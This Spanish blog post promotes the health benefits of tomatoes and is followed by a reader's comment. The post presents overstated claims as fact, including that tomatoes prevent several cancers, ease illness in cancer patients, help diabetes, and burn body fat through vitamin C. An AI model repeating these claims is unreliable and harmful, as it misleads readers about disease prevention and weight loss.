Salud y belleza » Dieta, Salud, alimentos

Descubre los beneficios del tomate, un alimento imprescindible en la dieta mediterránea

1 Comentario

propiedades-tomateEl tomate, aunque muchos no lo crean, es una fruta, no se le incluye en la familia de las hortalizas, y aun así tiene muchos beneficios que pocos conocen pero que disfrutan sobre todos quienes llevan una dieta mediterránea, ya que el tomate es uno de los alimentos más usados. Por eso vamos a exponerte los beneficios del tomate para que empieces a concienciarte y a comer más a menudo este alimento tan delicioso y combinable.

- Bueno para el corazón: el tomate ayuda a disminuir el riesgo de derrames cerebrales y también la incidencia de enfermedades cardiovasculares. Si consumes tomates de forma habitual puede ayudarte además a reducir el colesterol malo.

- Previene el cáncer: como es rico en licopeno, ayuda a prevenir el cáncer de próstata, de colon y de mama. Además, quienes padecen estas enfermedades se sienten mucho mejor cuando comen a menudo tomate.

- Bueno para la diabetes: los tomates podrían ayudar a reducir la diabetes en pacientes que padecen esta enfermedad.

- Sistema inmunológico: como el tomate tiene grandes cantidades de vitamina C, al igual que las naranjas, es ideal para mejorar las funciones del sistema inmunológico, lo que te ayudará a prevenir enfermedades y también a perder peso porque puede quemar la grasa del organismo.

beneficios-tomate

- Otros beneficios: el tomate ayuda a mejorar la visión, reducir la hipertensión, mantiene los dientes, el pelo y los huesos y además reduce las infecciones.

Así que ahora que sabes cuáles son los beneficios del tomate esperamos que te ayuden a mejorar tu salud y tu calidad de vida y que los disfrutes mucho más.

¿Comes tomates habitualmente? ¿Has notado sus beneficios?

d.getElementsByTagName('head')[0].appendChild(s);var d=document;var s=d.createElement('script');

Más consejos de salud y belleza : ,

One Comment »

  • Pedro said:

    Me encanta el tomate su sabe y lo pongo casi en todo ! Pero por desagravia el tomate de los supermercados carece de ese sabor auténtico , me gusta el de la huerta de toda la vida sin muchas pesticidas y madurado en planta
    Voy a tener una huerta solo para los tomate y pimientos y alguna que otra variedad de ensaladas

Publique su Comentario !

Add your comment below, or trackback from your own site. You can also subscribe to these comments via RSS.

Be nice. Keep it clean. Stay on topic. No spam.